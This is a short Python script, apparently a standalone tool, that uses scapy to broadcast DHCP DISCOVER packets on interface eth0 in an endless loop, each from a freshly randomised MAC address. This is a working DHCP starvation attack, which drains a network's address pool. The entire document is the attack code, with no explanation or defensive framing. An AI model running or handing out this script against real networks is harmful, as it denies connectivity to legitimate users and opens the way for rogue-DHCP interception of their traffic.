from scapy.all import *
import random

def random_mac():
    return "02:00:%02x:%02x:%02x:%02x" % (
        random.randint(0,255),
        random.randint(0,255),
        random.randint(0,255),
        random.randint(0,255)
    )

while True:
    mac = random_mac()

    pkt = Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") / \
          IP(src="0.0.0.0", dst="255.255.255.255") / \
          UDP(sport=68, dport=67) / \
          BOOTP(chaddr=mac2str(mac)) / \
          DHCP(options=[("message-type","discover"), "end"])

    sendp(pkt, iface="eth0", verbose=0)




